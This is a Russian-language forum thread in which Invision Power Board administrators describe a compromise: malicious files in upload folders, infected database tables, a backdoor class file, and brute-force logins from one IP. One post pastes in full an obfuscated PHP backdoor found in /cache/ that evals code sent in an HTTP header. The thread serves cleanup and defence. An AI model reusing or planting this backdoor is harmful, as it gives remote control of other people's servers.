Перейти к публикации
View in the app

A better way to browse. Learn more.

Дизайн и модификация Invision Community

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Security update

Рекомендованные сообщения

Опубликовано:

заметил на днях:

в /uploads/monthly 03_2013 (могут оказаться и другие директории)

файлы с точно такими же именами как и jpg, но имебщие расширение .ipb

внутри файла - аналогичное говно что и в zx.php и им подобным (см в этой теме)

лечение - удалить

Опубликовано:

Backdoor новый обнаружился - \admin\sources\classes\class_private_permissions.php. Инит в class_permissions.php. Код не сохранили, к сожалению. Он поломал авторизацию на форуме, потому и нашли быстро.

  • 1 месяц спустя...
Опубликовано:

Здравствуйте.

Заметил и у себя эту заразу - photo-128.jpg в /uploads/profile ..

Так же две таблицы заражены в бд, как и описывалось в этой теме. В директории /cache/ был файл f894eade.php , с содержанием

<?php $_d9eceec="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_d9ecee="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_29d69c=$_d9eceec('',$_d9ecee('aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7'));$_29d69c();?>

, удалил.

Бэкапов того времени не сохранилось что бы подменить зараженные таблицы .. Как можно поправить ситуацию?

Опубликовано:

Профи, помогите пожалуйста решить эту проблемку!

Опубликовано:

Прочтите тему эту от А до Я.

 

Ваше решение.

 

Оно не только в photo-128.jpg может быть, но и под другими названиями. Извлеките всю папку на свой пк /uploads/profile

и пробежитесь по аватарам.

Опубликовано:

Спасибо.

В директории /forum/hooks присутствует такой файл - alpha_e63f34c20c332f99431e93224eae471a.php

с содержанием -

<?php

class alpha
{
public function getOutput()
{
    $template = ipsRegistry::instance()->output->getTemplate('mlist')->member_alpha_ru();

       $js = <<<JS

			<script type='text/javascript'>
				$('alpha_switch').observe('click', function(){
						if( $('member_alpha_ru') )
						{
							$('member_alpha').toggle();
							$('member_alpha_ru').toggle();
						}
				} );

				$('alpha_switch_en').observe('click', function(){
						if( $('member_alpha') )
						{
							$('member_alpha').toggle();
							$('member_alpha_ru').toggle();
						}
				} );

JS;
       if ( ord( urldecode(ipsRegistry::$request['quickjump']) ) > 90 )
       {
           $js .= <<<JS
				$('member_alpha').toggle();
JS;
       }
       else
       {
           $js .= <<<JS
				$('member_alpha_ru').toggle();
JS;
       }

       $js .= <<<JS
			</script>
JS;

       return $template . $js;
}
}

Это тоже оно? Вроде бы раньше не было ..

Опубликовано:

Вроде бы все директории проверил, файл photo-128.jpg удалил (появлялся несколько раз заново), таблицы на предмет -

photo-128.jpg и tmpgw4ia4

почистил ручками, переимпортировал все хуки и перестроил весь кэш. Пока полет нормальный.

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Опубликовано:

Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.

Это файл ибровского хука "Русские буквы в списке юзеров"

Опубликовано:

Спасибо ребята, не дали пропасть!

Опубликовано:

Вчера обнаружил массовые попытки войти в АЦ форума под отображаемым именем админа с IP:37.1.207.98 . Покурив интернет понял, что не у меня одного ..

Опубликовано:

Поменяйте путь в АЦ

Опубликовано:

Поменяйте путь в АЦ

Сразу же сменил. Удивило то, что почти у всех к кому приходили "гости" - форум IPB 3.*.* и один и тот же IP в журналах авторизации АЦ. Бот видит только отображаемое имя, его и вводит при попытке авторизоваться.

Изменено пользователем Minnow

Опубликовано:

на одном форуме видел в логах этот ip

пытался авторизоваться под логином IP. Board

очевидно бот решил, что на форуме у админа должен быть логин по названию скриптаlaugh.giflaugh.giflaugh.gif

Создайте аккаунт или войдите в него для комментирования

Сейчас на странице 0

  • Нет пользователей, просматривающих эту страницу.

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.